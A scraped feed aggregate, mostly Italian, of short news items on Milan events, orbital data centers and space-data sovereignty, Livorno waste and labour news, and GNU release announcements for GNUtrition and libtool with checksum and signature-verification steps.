Il programma comprende inoltre incontri culturali, iniziative dedicate al benessere e momenti di aggregazione che accompagneranno il pubblico fino alla conclusione del 12 luglio.
ACCESSO GRATUITO
Uno dei punti di forza del NAMA Summer Festival è la sua accessibilità.
Tutte le iniziative all’aperto sono gratuite e aperte a tutti.
Per alcuni appuntamenti ospitati negli spazi interni o nel cosiddetto “Giardino Nascosto” potrebbe invece essere necessario possedere la tessera associativa NAMA,
richiedibile tramite registrazione online.
L’edizione 2026 rappresenta anche un importante esempio di partecipazione cittadina.
La raccolta fondi promossa per sostenere il festival ha coinvolto circa 960 sostenatori, ottenendo uno dei risultati più rilevanti tra i progetti finanziati attraverso il Crowdfunding Civico del Comune di Milano.
In una Milano che nei mesi estivi tende a svuotarsi, il NAMA Summer Festival propone un’alternativa ai grandi eventi a pagamento. Musica, cinema, attività culturali e spazi verdi si fondono in un format pensato per creare relazioni e mantenere vivo il quartiere della Martesana anche durante l’estate.
Per chi è alla ricerca di qualcosa da fare a Milano tra giugno e luglio senza spendere nulla, il NAMA Summer Festival si conferma come uno degli appuntamenti più interessanti da inserire in agenda.
L'articolo NAMA Summer Festival: un mese di appuntamenti gratuiti nel cuore della Martesana proviene da InfoMilano.news.





La prossima edizione del Workshop GARR - Net Makers si tiene dal 3 al 5 novembre 2026 presso l’Università Roma Tre, nel Dipartimento di Lettere.

È stato pubblicato il Compendium GÉANT 2025, il report annuale che raccoglie dati, analisi e approfondimenti sulle reti nazionali per la ricerca e l’istruzione (NREN) in Europa.
[ITA] Un recente (circa 10 giorni fa) aggiornamento dei nostri servizi di posta pare stia causando dei problemi con alcuni account, in combinazione con Thunderbird. I sintomi variano: non si vede più l’elenco dei folder, oppure lo si vede, ma non compaiono i messaggi nuovi – può sembrare che non stiate più ricevendo posta.
La posta sta venendo consegnata regolarmente! Il problema è nell’interazione con i client. I messaggi nuovi si possono vedere, per esempio, utilizzando la webmail.
Stiamo indagando per risolvere il problema.
[ENG] It appears that a recent (about 10 days ago) major upgrade of our email systems is causing some issues to a subset of users, primarily when using Thunderbird as their email client. Symptoms vary: TB might stop showing the list of folders, or perhaps it will show it, but then the INBOX folder will not display new messages. It might look like you’re no longer receiving any email.
Email is being delivered without issues! The problem is with the client. You can, for example, access new messages by using the webmail.
We’re investigating to attempt to resolve this issue.
AGGIORNAMENTO / UPDATE
[ITA] Si può temporaneamente aggirare il problema, per chi usa Thunderbird, disabilitando la compressione IMAP (RFC 4978) andando nelle impostazioni avanzate ed impostando la variabile mail.server.default.use_compress_deflate a false.
[ENG] It is possible to temporarily work around the issue for Thunderbird users, by going into the advanced settings, looking for the mail.server.default.use_compress_deflate variable, and setting it to false.
AGGIORNAMENTO 2 / UPDATE 2
[ITA] Dovremmo essere riusciti a mitigare il problema lato server, nessuna modifica al client è più necessaria.
[ENG] We think we have mitigated the issue server-side, so no client changes should be necessary anymore.

Immagine in evidenza rielaborata con Intelligenza Artificiale
I data center divorano l’1,5% dell’elettricità mondiale. Per la precisione: 415 terawattora nel 2024. L’equivalente di quasi l’intero consumo annuo di energia elettrica di una nazione come la Francia. Ma è una quota destinata a più che raddoppiare entro il 2030, spinta soprattutto dall’intelligenza artificiale generativa, che l’Agenzia Internazionale dell’Energia identifica come “il fattore più importante” di questa crescita.
Le reti elettriche globali sono già sotto pressione, ma la costruzione di nuove linee di trasmissione richiede dai quattro agli otto anni nei paesi più avanzati. Nel frattempo, la domanda di calcolo aumenta così velocemente che nessuna infrastruttura terrestre riesce a stare al passo.
È in questo contesto che governi e aziende tecnologiche hanno cominciato a guardare allo spazio. Del resto, lo spazio offre energia solare continua senza competere con le reti terrestri, la possibilità di sfruttare il raffreddamento passivo nel vuoto senza consumare acqua e di elaborare i dati direttamente a bordo dei satelliti che li raccolgono, senza doverli trasmettere integralmente a Terra. Quello che sembrava fantascienza è diventato, nel giro di pochi anni, un programma industriale con date, contratti e lanci già effettuati.
A maggio 2025, la Cina ha lanciato i primi satelliti di una costellazione per l’elaborazione dei dati direttamente nello spazio. Nella stessa direzione si stanno muovendo anche gli Stati Uniti. Le due grandi potenze hanno avviato programmi concreti, ancora in parte sperimentali, per portare calcolo e archiviazione oltre il cielo. Si tratta, però, di un salto tecnologico con una conseguenza politica: in futuro, i dati più strategici di governi, eserciti e grandi aziende potrebbero non trovarsi più in nessuna nazione.
I satelliti producono quantità enormi di dati, spesso troppo grandi per essere inviati interamente sulla Terra in tempo reale. Processarli in orbita riduce la latenza e la dipendenza dalle stazioni terrestri. Hewlett Packard Enterprise ha dimostrato la fattibilità di questo approccio con il programma Spaceborne Computer. La multinazionale statunitense, leader nelle soluzioni tecnologiche edge-to-cloud (in cui l’elaborazione dei dati avviene in parte sul dispositivo remoto e in parte sui server centrali), ha installato server commerciali standard sulla Stazione Spaziale Internazionale (ISS) nel 2017, 2021 e 2024. Questo ha permesso di ridurre fino al 90% il volume dei dati da trasmettere a Terra.
In un’intervista a Via Satellite (novembre 2025), Clint Crosier, già responsabile della pianificazione della U.S. Space Force e oggi direttore Aerospace & Satellite Solutions di AWS, ha illustrato i risultati pratici. In un test con la startup italiana D-Orbit, elaborare i dati direttamente a bordo del satellite ha permesso di trasmettere a Terra solo le immagini realmente utili: il satellite ha continuato a soddisfare tutti i requisiti della missione usando il 42% in meno di banda. Liberando quella banda, lo stesso satellite può inviare quasi il doppio dei dati utili senza alcuna modifica all’hardware. Il vantaggio per le applicazioni militari è evidente (non a caso, il Department of Defense Space Strategy statunitense identifica lo spazio come dominio operativo a tutti gli effetti).
Gli Stati Uniti stanno inoltre sviluppando la Proliferated Warfighter Space Architecture (PWSA) della Space Development Agency (SDA): una costellazione di centinaia di piccoli satelliti in orbita bassa interconnessi otticamente. Una flotta progettata per garantire comunicazioni resilienti e rilevamento missilistico anche in caso di attacchi a infrastrutture terrestri. A dicembre 2025, la SDA ha assegnato contratti per circa 3,5 miliardi di dollari per la costruzione di altri 72 satelliti di tracciamento missilistico. La logica strategica è chiara: in uno scenario di conflitto, gli impianti e le installazioni a terra sono tra i primi obiettivi a essere colpiti. Una capacità di calcolo dislocata nello spazio, interconnessa otticamente e ridondante offre invece maggiore sicurezza e una continuità operativa difficilmente replicabile sulla Terra.
Dagli Stati Uniti alla Cina. Come già accennato, il 14 maggio 2025 la Repubblica Popolare ha lanciato i primi 12 satelliti della Three-Body Computing Constellation, sviluppata dall’istituto di ricerca Zhejiang Lab e dall’azienda ADA Space di Chengdu. Ogni satellite offre 744 TOPS (tera-operazioni al secondo) e l’intera rete è progettata per espandersi fino a 2.800 satelliti, con una potenza computazionale complessiva di 1.000 peta-operazioni al secondo, paragonabile per ordine di grandezza ai supercomputer terrestri più potenti. I satelliti sono collegati da link laser inter-satellite (un collegamento che usa fasci di luce laser per trasmettere dati direttamente da un satellite all’altro), alimentati da pannelli solari e raffreddati passivamente dal vuoto, eliminando i costosi sistemi di raffreddamento a liquido dei data center terrestri.
Secondo un piano quinquennale citato dall’emittente televisiva cinese CCTV e ripreso dalla Reuters lo scorso 29 gennaio, la CASC (China Aerospace Science and Technology Corporation) ha annunciato la costruzione di un’infrastruttura digitale spaziale da un gigawatt di potenza, identificata come pilastro del 15° Piano Quinquennale cinese, integrando capacità cloud, edge computing e terminali per elaborare dati direttamente in orbita.
C’è però da osservare che la corsa ai data center orbitali non è più una prerogativa dei governi. A novembre 2025, Starcloud ha lanciato il primo satellite equipaggiato con una GPU NVIDIA H100, realizzando la prima dimostrazione di addestramento AI direttamente in orbita. L’11 gennaio 2026, con la missione Twilight di SpaceX, sono arrivati in orbita i primi due nodi del data center orbitale della statunitense Axiom Space, sviluppati in collaborazione con la canadese Kepler Communications e collegati tramite link ottici da 2,5 Gbps.
Google, con il progetto Suncatcher, punta invece a una costellazione di satelliti dotati di TPU (i processori per l’intelligenza artificiale progettati da Google) alimentati da energia solare, con un primo test, in collaborazione con la società di San Francisco Planet Labs, previsto per il 2027. Secondo indiscrezioni, SpaceX starebbe preparando una generazione aggiornata dei satelliti della sua costellazione Starlink capace di ospitare carichi di calcolo, con link ottici inter-satellite a banda ultralarga.
A rendere economicamente plausibili delle infrastrutture permanenti in orbita è anche la riduzione dei costi di lancio, che – secondo uno studio della NASA – sono passati da circa 54mila dollari al chilogrammo con lo Space Shuttle a 2.700 dollari con il razzo riutilizzabile Falcon 9 della società spaziale di Elon Musk: una riduzione di venti volte in due decenni. Tuttavia, la gestione privata di sistemi potenzialmente critici introduce domande (per ora) senza risposta: a cominciare da chi sia responsabile in caso di violazione dei dati su un satellite commerciale.
Dal canto suo, l’Europa non dispone di un programma comparabile per il cloud orbitale. Il progetto IRIS² – 290 satelliti per comunicazioni sicure, contratto da 10,5 miliardi firmato nel dicembre 2024 con il consorzio SpaceRISE – non include infrastrutture di calcolo orbitale autonome. Sul fronte della ricerca, il progetto europeo ASCEND ha completato nel 2024 uno studio che conferma la fattibilità tecnica dei data center orbitali e si pone l’obiettivo di dispiegare 1 GW entro il 2050. ASCEND è guidato da Thales Alenia Space, joint venture tra Thales e Leonardo: la partecipazione dell’azienda italiana è il contributo più diretto del nostro paese a questo scenario.
C’è poi da notare che D-Orbit, startup comasca già protagonista del test AWS, è tra le realtà italiane più avanzate sul tema dell’elaborazione dati in orbita e ha sottoscritto contratti con l’ESA (l’Agenzia spaziale europea) nell’ambito della costellazione di osservazione IRIDE, finanziata con fondi PNRR. Ma l’Italia non ha un programma nazionale dedicato al cloud orbitale. Il rischio è quello già visto in altri ambiti digitali: competenze industriali elevate senza controllo sull’infrastruttura finale.
Il 24 febbraio 2022, all’ora esatta dell’invasione russa dell’Ucraina, un attacco informatico ha colpito la rete KA-SAT di Viasat (il gigante californiano delle telecomunicazioni satellitari), disabilitando decine di migliaia di modem satellitari in Ucraina e in Europa. Il malware usato – un wiper chiamato AcidRain – non ha violato nessun satellite in orbita, sfruttando invece una vulnerabilità VPN in server di gestione della rete fisicamente localizzati nel nord Italia, propagandosi fino a disabilitare 5.800 turbine eoliche in Germania. A maggio 2022, Stati Uniti, Unione Europea, Regno Unito e una dozzina di governi europei – inclusa l’Italia – hanno attribuito pubblicamente l’attacco al GRU, l’intelligence militare russa.
Il caso Viasat contiene una lezione che vale doppio per i data center orbitali: il punto più vulnerabile di un’infrastruttura spaziale non è il satellite. È tutto ciò che lo gestisce da Terra: stazioni di controllo, reti di uplink, sistemi di autenticazione, catena di fornitura dell’hardware. A questo si aggiunge un problema strutturale specifico dello spazio: il patching. Un data center terrestre può infatti ricevere una patch di sicurezza in pochi minuti. Un satellite in orbita bassa ha finestre di comunicazione limitate, banda ristretta e nessuna possibilità di intervento fisico. Se un sistema orbitale venisse compromesso, la risposta sarebbe strutturalmente più lenta e, in alcuni scenari, impossibile senza un nuovo lancio.
Jamming e spoofing GPS sono già operativi in zona di conflitto e documentati sistematicamente dall’Agenzia europea per la sicurezza aerea (EASA) nel Mar Nero, in Medio Oriente e nel Baltico: dimostrano che l’interferenza deliberata sulle infrastrutture spaziali è una realtà, non un’ipotesi. Un attacco a un sistema orbitale porterebbe le stesse complessità a un livello superiore: chi ha giurisdizione, chi può intervenire, con quali strumenti e in quale tempo utile.
L’Outer Space Treaty del 1967 attribuisce allo Stato di lancio la giurisdizione e il controllo sugli oggetti spaziali, indipendentemente da dove operino. Ma questo trattato non contempla infrastrutture digitali, non regola la proprietà dei dati in orbita, non prevede meccanismi di applicazione in caso di violazione informatica.
A quasi sessant’anni dalla firma, non esiste nessun trattato internazionale che disciplini specificamente la protezione dei dati nello spazio. Nel 2019, dopo otto anni di negoziato, l’UN COPUOS (la Commissione delle Nazioni Unite sull’uso pacifico dello spazio extra-atmosferico) ha adottato 21 linee guida per la sostenibilità a lungo termine delle attività spaziali: volontarie, non vincolanti e relative a detriti, sicurezza operativa e traffico orbitale. La protezione dei dati non è contemplata.
Il primo segnale che la questione stia diventando urgente sul piano normativo è arrivato a gennaio di quest’anno: SpaceX ha depositato all’americana FCC (Federal Communications Commission) una richiesta per lanciare fino a un milione di satelliti definiti esplicitamente “orbital data centers”. Questo è il primo iter normativo al mondo che affronta direttamente il tema, ma riguarda una sola nazione e non tocca le questioni di giurisdizione sui dati.
Payal Arora, professoressa di AI inclusiva all’Università di Utrecht (Olanda), ha sintetizzato il problema in un’analisi pubblicata da Rest of World nel febbraio 2026: se i dati dei cittadini sono elaborati in orbita, la sovranità digitale “diventa ambigua”, sospesa tra il Paese d’origine, lo Stato di lancio e l’operatore commerciale del satellite. Nessuno dei meccanismi esistenti – né il diritto spaziale internazionale, né il diritto cyber nazionale, né i trattati di mutua assistenza giudiziaria – è stato progettato per rispondere a questi aspetti.
Per decenni il potere digitale è stato ancorato a piattaforme fisiche entro confini nazionali. Anche i cavi sottomarini, che trasportano oltre il 95% del traffico internet globale, hanno una giurisdizione di riferimento, con trattati, procedure e responsabilità definite. Il cloud orbitale rompe questo sistema. I dati possono essere archiviati ed elaborati in luoghi che nessuna autorità nazionale può raggiungere, né fisicamente né giuridicamente. In sostanza, per la prima volta, la localizzazione dei dati smette di coincidere con il territorio.
Come spiega Jane Munga, ricercatrice per l’Africa al Carnegie Endowment for International Peace, la sovranità tende a seguire la proprietà dell’infrastruttura: chi non partecipa al suo possesso e alla sua governance rischia di essere relegato a produttore di dati senza alcuna capacità reale di controllo su come siano archiviati, elaborati o usati. Un’incognita che sconfina dal campo dell’innovazione tecnologica. Quello in corso è un passaggio epocale le cui conseguenze sono ancora da scrivere. Il rischio è che si erigano infrastrutture informatiche cruciali per nazioni, imprese e cittadini che superino la sovranità digitale degli Stati. Senza che ci siano le regole per governarle.
L'articolo La sfida dei data center spaziali proviene da Guerre di Rete.


Quattro giornate dedicate al grande schermo con ingressi a prezzo speciale e l’arrivo di uno dei film più attesi della stagione.
Dal 15 al 18 giugno torna Cinema in Festa, l’iniziativa nazionale che consente di assistere a qualsiasi film nelle sale aderenti pagando soltanto 3,50 euro a biglietto.
Anche molti cinema di Milano e della Lombardia hanno aderito all’evento, offrendo agli spettatori la possibilità di vivere l’esperienza del cinema a un costo particolarmente vantaggioso.
Tra le pellicole più attese di questa edizione spicca Toy Story 5,
il nuovo capitolo della storica serie Disney-Pixar che riporta sul grande schermo Woody, Buzz Lightyear, Jessie e gli altri personaggi che hanno conquistato generazioni di spettatori. Il film farà il suo debutto nelle sale italiane il 18 giugno e sarà tra le principali novità disponibili negli ultimi giorni della manifestazione.
Nel nuovo episodio, i giocattoli si troveranno ad affrontare una situazione mai vista prima: l’influenza della tecnologia nella vita dei più piccoli. La vicenda ruota attorno a Lilypad, un moderno tablet che cattura immediatamente l’interesse della giovane Bonnie, mettendo in discussione l’importanza dei giocattoli tradizionali.
Cinema in Festa nasce con l’obiettivo di favorire il ritorno del pubblico nelle sale cinematografiche ed è promosso dall’intero comparto dell’industria cinematografica italiana.
Negli ultimi anni l’iniziativa ha raccolto un crescente consenso, diventando un appuntamento molto apprezzato dagli appassionati di cinema.
L’evento rappresenta un’ottima opportunità sia per recuperare i film ancora in programmazione sia per scoprire le nuove uscite previste per l’estate.
Per verificare l’elenco completo delle sale aderenti e consultare gli orari delle proiezioni,
è possibile visitare i siti ufficiali dei cinema partecipanti.
L'articolo Ritorna Cinema in Festa: film a 3,50 euro e debutta anche Toy Story 5 proviene da InfoMilano.news.

L'articolo Guida pratica per scegliere un ERP aziendale adatto ai propri processi proviene da FullPress.
Non è possibile sostituire Carola Frediani, fondatrice, anima e colonna portante di Guerre di Rete. Allo stesso tempo, sappiamo per certo che l’ultima cosa che Carola avrebbe voluto è che questo progetto terminasse.
Carola ha sempre voluto ampliare e far crescere Guerre di Rete. Non c’era nulla che le desse più soddisfazione che individuare nuovi collaboratori e collaboratrici, allargare la squadra della redazione, trasformare ciò che era nato come una newsletter personale in un progetto collettivo.
È per questo che Guerre di Rete va avanti, in memoria di Carola e d’accordo con la sua famiglia.
Guerre di Rete prosegue mantenendo inalterato il patto con il lettore. Il nostro continuerà a essere un giornalismo rigoroso, approfondito, autonomo e indipendente.
I nostri lettori e le nostre lettrici sono coloro che ci permettono di andare avanti, finanziando un progetto che quindi solo a loro vuole e deve rispondere.
Il lavoro di Carola Frediani è la nostra bussola. L’affetto e la stima che proviamo per lei è la ragione per cui vogliamo portare avanti la sua missione.
Lo faremo con tutte le nostre forze.
La redazione di Guerre di Rete
L'articolo Guerre di Rete continua, in memoria di Carola Frediani proviene da Guerre di Rete.

Milano accoglie una nuova location destinata a diventare uno dei punti di riferimento per
pranzi,aperitivi, eventi e serate all’aperto. Giovedì 11 giugno 2026 arriva infatti la
grande inaugurazione di Cascina Corten Milano, il nuovo spazio situato nella zona di Merlata Bloom,
una delle aree più dinamiche e in forte crescita della città.
Per celebrare l’apertura è stato organizzato un esclusivo Opening Party con ingresso su accredito e drink omaggio per gli ospiti che parteciperanno all’evento inaugurale.

–
Per partecipare gratuitamente basta Accreditarsi :
https://www.infomilano.news/eventi/inaugurazionecascinacorten/
–
La nuova Cascina Corten si trova in Via Pier Paolo Pasolini 3, a pochi passi dal Merlata Bloom Milano, il nuovo polo commerciale e di intrattenimento che negli ultimi anni ha trasformato completamente questa zona della città.
L’obiettivo della location è offrire un ambiente moderno immerso nel verde, perfetto per pranzi,aperitivi al tramonto, eventi aziendali, feste private, DJ set e appuntamenti estivi.
L’evento inaugurale sarà l’occasione ideale per scoprire gli spazi della nuova struttura e vivere una serata all’insegna della musica e della convivialità.
Durante la serata gli ospiti potranno partecipare a:
Una formula pensata per chi cerca nuove location a Milano dove trascorrere una serata diversa dal solito, lontano dal caos del centro ma facilmente raggiungibile.
–
Per partecipare gratuitamente basta Accreditarsi :
https://www.infomilano.news/eventi/inaugurazionecascinacorten/
–
Negli ultimi anni Milano ha visto nascere numerosi spazi dedicati agli eventi outdoor, ma la zona Merlata rappresenta una delle novità più interessanti del panorama cittadino.
La presenza di ampie aree verdi, la vicinanza alle principali arterie cittadine e il continuo sviluppo del quartiere rendono Cascina Corten una location con un enorme potenziale per ospitare eventi, aperitivi, festival e appuntamenti musicali durante tutta la stagione estiva.
Chi ama scoprire nuove location a Milano troverà in Cascina Corten uno spazio completamente nuovo, ideale per vivere l’aperitivo in un contesto rilassato e contemporaneo.
=====
CASCINA CORTEN
Via Pier Paolo Pasolini 3, Milano
L'articolo Cascina Corten apre a Milano : Giovedì 11 Giugno la grande inaugurazione proviene da InfoMilano.news.
Non potevano certamente passare inosservati agli operatori di AAMPS/Retiambiente due “big bag” in polietilene di grosse dimensioni contenenti materiale di risulta da lavorazioni edili abbandonati nelle ore notturne accanto ad un cassonetto stradale per la raccolta dei rifiuti in località Le Vaschette sul Romito a ridosso della scogliera.
L'articolo Eternit abbandonato sul Romito: intervengono gli Ispettori Ambientali proviene da Aamps Livorno.
Il nuovo assetto geopolitico mondiale ha messo a nudo una serie di problematiche che sono state trascurate troppo a lungo. In pratica, quello che per anni abbiamo visto accadere nel software, ovvero l’entusiasmo per le nuove feature che andava a coprire la necessità di rendere sicuro il loro utilizzo, si è applicato anche in mille […]
L'articolo Infrastrutture Critiche e Geopolitica: è l’Era dell’Antifragilità proviene da Securityinfo.it.





Dal 8 al 12 giugno 2026, Helsinki ospita TNC26, la principale conferenza internazionale dedicata al networking per la ricerca e l'istruzione, organizzata da GÉANT in collaborazione con CSC, il centro nazionale finlandese per le infrastrutture IT scientifiche che gestisce Funet, la rete della ricerca finlandese.
Da mesi gli operai della Solvay degli stabilimenti di Livorno e Rosignano sono alle prese con gravi problematiche per quanto riguarda la retribuzione e gli stipendi. L';azienda, dopo aver deciso di cambiare gestionale per l'elaborazione dei cedolini, ha iniziato ad pagare le retribuzioni con vistosi ammanchi di denaro. In alcune occasioni agli operai sono state corrisposte cifre più alte per poi essere sottratte nuovamente, il mese successivo, senza alcuna spiegazione tecnica e senza giustificativi precisi. Dopo il primo mese la situazione poteva e doveva essere risolta mentre invece i disagi si stanno protraendo ormai da troppo tempo.
Per questo motivo nella giornata odierna era stata indetta un'assemblea sindacale dalla RSU Solvay. Assemblea che è stata poi negata dalla dirigenza aziendale. I Lavoratori si sono presentati comunque davanti alla sede di confindustria, una delegazione fuori dall'orario di lavoro, in segno di protesta. Anche l'associazione di categoria ha deciso di sbarrare il portone.
Questo è l'tteggiamento che i padroni hanno deciso di tenere di fronte ad una legittima mobilitazione e di fronte a problematiche che hanno come unico responsabile l'azienda e non certo i lavoratori.
Serve chiarezza rispetto al pagamento degli stipendi. Una multinazionale, come la solvay, non è in grado di risolovere una situazione come questa?
Grazie alle proteste, in entrambi gli stabilimenti, la RSU è stata convocata per il 9 giugno. USB farà la sua parte affinchè si arrivi ad una soluzione che veda salvaguardati gli interessi dei lavoratori.
RSU Solvay
USB Livorno


Milano 5 Giugno 2026 – Milano riscopre il piacere del cinema condiviso sotto le stelle.
Da giugno a settembre ritorna “Social Cinema”, la rassegna itinerante ideata da Cinevan che porterà proiezioni gratuite, documentari, incontri e momenti di socialità nei quartieri della città, trasformando cortili, parchi e piazze in luoghi di incontro e partecipazione.
Un vecchio van Volkswagen attrezzato come cinema mobile attraverserà sei quartieri milanesi per raccontare, le storie di chi ogni giorno costruisce comunità: associazioni, volontari, abitanti, educatori e realtà sociali che animano il tessuto urbano spesso lontano dai riflettori.
Il progetto prenderà il via il 9 giugno dal quartiere Muggiano, nella periferia ovest della città, insieme all’associazione Cous Cous Clan. Poi il viaggio proseguirà tra il Borgo Intergenerazionale di Greco con ABCittà, il Parco Ravizza con i volontari del NAGA, i giardini condivisi di via Gattamelata con ParteciPrato, il giardino della Fondazione IBVA, fino alle case popolari MM di via Scaldasole e viale Lombardia insieme ad Arci Fiocchi.

In totale saranno organizzate 18 proiezioni gratuite in 6 quartieri cittadini, accompagnate da 6 narrazioni video partecipate e da una selezione di film scelta insieme agli abitanti: ogni tappa ospiterà tre serate gratuite di cinema all’aperto, con una programmazione pensata per coinvolgere pubblici diversi – bambini, famiglie, giovani e anziani – accompagnata da aperitivi comunitari, tavolate condivise e occasioni di incontro tra abitanti.
“Social Cinema” non sarà soltanto una rassegna cinematografica. Al centro dell’iniziativa ci sono anche sei brevi documentari originali dedicati ai territori coinvolti, narrati dalla giornalista Sara Zambotti e realizzati insieme alle associazioni partner. I video affronteranno temi cruciali per la Milano contemporanea: il diritto alla casa, le politiche migratorie, la cittadinanza attiva, la rigenerazione urbana e il valore degli spazi pubblici come luoghi di relazione.
L’obiettivo è semplice e ambizioso allo stesso tempo: usare il cinema come strumento culturale capace di creare connessioni sociali e riportare le persone negli spazi condivisi della città.
“Una comunità è un organismo che ha bisogno di essere nutrito per prosperare”, spiega Luca Cusani promotore del progetto. Ed è proprio questo il cuore di Social Cinema: costruire momenti di aggregazione autentica attraverso la cultura accessibile e gratuita.
Il progetto è realizzato da Cinevan con il contributo del Bando 57 di Fondazione di Comunità Milano, in partenariato con ABCittà, Fondazione IBVA e Parteciprato, e con la collaborazione di Arci Fiocchi, Cous Cous Clan, NAGA e MM Spa.

Programma completo su https://www.cinevan.it/social-cinema/
Per informazioni:
+39 328 104 3876
L'articolo Social Cinema: il cinema gratuito riaccende i quartieri di Milano proviene da InfoMilano.news.
GNUtrition 0.33 is now released. This marks the first release of GNUtrition since 2012, approximately 14 years ago!
GNUtrition is free nutrition analysis software. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information.
This release is a complete rewrite of GNUtrition in C rather than Python 2 with a new GTK 3 interface replacing the old GTK 2 one. The Nutrient Database of Standard Reference, which stopped getting updated in 2018, was replaced with the USDA Food and Nutrition Database for Dietary Studies. With help from some test volunteers, the build and installation process was better streamlined to resolve critical issues and difficulties so that GNUtrition can be a better program overall.
Considering the time between releases, GNUtrition currently is not available on OS package repositories (as far as I am aware). If you package software for your operating system's package manager, it would be very helpful if you could start packaging GNUtrition so that it may be even more easily used by people on said systems. If you don't, you may still request to those who do to start including GNUtrition.
Thank you to everyone who tested/used GNUtrition 0.33's release candidates and provided meaningful feedback on its functionality, design, and so on. I would also like to especially thank Jason Self for providing us with the C rewrite in the first place.
More information about GNUtrition may be found on its home page at http://gnu.org/so ... tware/gnutrition/. This release can be obtained from the ftp.gnu.org server at one of the following:
ftp://ftp.gnu.o ... gnu/gnutrition/
http://ftp.gnu.or ... g/gnu/gnutrition/
https://ftp.gnu.o ... g/gnu/gnutrition/
The FTP mirror list is available at https://gnu.or ... order/ftp.html, and https://ftpmirror ... u.org/gnutrition/ will automatically redirect you to a nearby mirror.
Please report any problems you experience to the GNUtrition bug reports mailing list: bug-gnutrition@gnu.org (https://lists.gnu ... fo/bug-gnutrition).
Happy hacking and calorie counting!!
Version 5.5 of GNU direvent is available for downloads. New in this version:
See the NEWS file for more details.

Informiamo i cittadini che sabato 6 giugno il Centro Ambientale Temporaneo di Via dei Cordai effettuerà apertura con orario 9:00 – 12:00.
Il servizio sarà regolarmente attivo per il conferimento delle varie tipologie di rifiuto, nel rispetto delle normative vigenti.
Ricordiamo che i quantitativi e le tipologie di rifiuti accettati saranno quelli previsti dalla tabella.
Per ulteriori informazioni: 800-031.266, info@aamps.livorno.it, facebook/instagram/APP (“AAMPS Livorno”).
L'articolo Centro Ambientale Temporaneo (CAT) 06/06/26 aperto in orario mattutino. proviene da Aamps Livorno.
| RIFIUTI URBANI TRATTATI | Aprile 2026 | TOTALE ANNO 2026 |
| Carta e cartoni | 725,55 | 2.999,70 |
| Imballaggi in vetro | 438,54 | 1.650,97 |
| Multimateriale Leggero | 669,81 | 2.620,38 |
| Legno e ingombranti | 478,01 | 1.940,22 |
| Frazione organica e compostabili | 1.388,92 | 5.559,82 |
| RAEE | 62,21 | 238,62 |
| Altre RD | 195,10 | 791,76 |
| Macerie | 98,95 | 370,49 |
| Rifiuto indifferenziato | 2.593,58 | 10.087,94 |
| Totale tonnellate | 6.650,67 | 26.259,90 |
| Efficienza % raccolta differenziata | 61,00% | 61,58% |
| Variaz. efficienza % RD su anno 2025 | -0,49% | -0,87% |
L'articolo Tonnellate di rifiuti urbani raccolti e trattati Aprile 2026 proviene da Aamps Livorno.
Un gruppo cybercriminale di lingua cinese fino a poco tempo fa concentrato prevalentemente sul mercato asiatico sta ampliando rapidamente il proprio raggio d’azione verso Europa e Africa. Secondo le analisi pubblicate da Proofpoint, il gruppo chiamato TA4922 ha aumentato sensibilmente il volume delle proprie operazioni nel corso del 2026, prendendo di mira organizzazioni nel Regno […]
L'articolo Il gruppo criminale cinese TA4922 adesso punta anche all’Europa proviene da Securityinfo.it.
Libtoolers!
The Libtool Team is pleased to announce the release of libtool 2.6.1, a beta release.
GNU Libtool hides the complexity of using shared libraries behind a
consistent, portable interface. GNU Libtool ships with GNU libltdl, which
hides the complexity of loading dynamic runtime libraries (modules)
behind a consistent, portable interface.
There have been 34 commits by 14 people in the 37 weeks since 2.6.0.
See the NEWS below for a brief summary.
Thanks to everyone who has contributed!
The following people contributed changes to this release:
Alexandre Janniaux (4)
Alexey Samsonov (1)
Anthony Mallet (1)
Arnold (1)
Dima Pasechnik (1)
Frederic Berat (1)
Ileana Dumitrescu (15)
KO Myung-Hun (4)
Kirill Makurin (1)
Mintsuki (1)
Nicolas Boulenguez (1)
Olly Betts (1)
Patrice Dumas (1)
Richard J. Mathar (1)
Ileana
[on behalf of the libtool maintainers]
==================================================================
Here is the GNU libtool home page:
https://gnu. ... g/s/libtool/
Here are the compressed sources:
https://alpha.gnu ... tool-2.6.1.tar.gz (2.1MB)
https://alpha.gnu ... tool-2.6.1.tar.xz (1.1MB)
Here are the GPG detached signatures:
https://alpha.gnu ... -2.6.1.tar.gz.sig
https://alpha.gnu ... -2.6.1.tar.xz.sig
Use a mirror for higher download bandwidth:
https://www.gnu.o ... rg/order/ftp.html
Here are the SHA256 and SHA3-256 checksums:
File: libtool-2.6.1.tar.gz
SHA256 sum: 52264ab2fca9464dea9f6a0355d39e49b18f40468b9b6dbc3d151a0dba307a4b
SHA3-256 sum: 59826fb74043179c38a393448b92dfcdfbe9046fd3b23a7079665984f22d6688
File: libtool-2.6.1.tar.xz
SHA256 sum: 3fb21f1e99fcdd8565c9b00fb1371db457b82a0da7cba273e1617c954b0ad1ee
SHA3-256 sum: 614bc3ed43293be989ec3305dae42fc4e81234429477490734a40f6d3316560b
Verify the SHA256 checksum with either sha256sum, sha256, or
'shasum -a 256'.
Verify the SHA3-256 checksum with 'cksum -a sha3 -l 256 --base64'
from coreutils-9.8.
Use a .sig file to verify that the corresponding file (without the
.sig suffix) is intact. First, be sure to download both the .sig file
and the corresponding tarball. Then, run a command like this:
gpg --verify libtool-2.6.1.tar.gz.sig
The signature should match the fingerprint of the following key:
pub rsa4096 2021-09-23 [SC]
FA26 CA78 4BE1 8892 7F22 B99F 6570 EA01 146F 7354
uid Ileana Dumitrescu <ileanadumitrescu95@gmail.com>
uid Ileana Dumitrescu <ileanadumi95@protonmail.com>
If that command fails because you don't have the required public key,
or that public key has expired, try the following commands to retrieve
or refresh it, and then rerun the 'gpg --verify' command.
gpg --locate-external-key ileanadumitrescu95@gmail.com
gpg --recv-keys 6570EA01146F7354
wget -q -O- 'https://savannah. ... ol&download=1' | gpg --import -
As a last resort to find the key, you can try the official GNU
keyring:
wget -q https://ftp.gnu.o ... u/gnu-keyring.gpg
gpg --keyring gnu-keyring.gpg --verify libtool-2.6.1.tar.gz.sig
This release is based on the libtool git repository, available as
git clone https://https.git ... g/git/libtool.git
with commit 79de7bb71bc0a1167f4c4ae8bd897976a0ff2b51 tagged as v2.6.1.
For a summary of changes and contributors, see:
https://gitweb.gi ... shortlog;h=v2.6.1
or run this command from a git-cloned libtool directory:
git shortlog v2.6.0..v2.6.1
This release was bootstrapped with the following tools:
Autoconf 2.73
Automake 1.18.1
Gnulib 2026-05-12 722f67e9716bf914c18d468336c1f4f9e5cce915
NEWS
** New features:
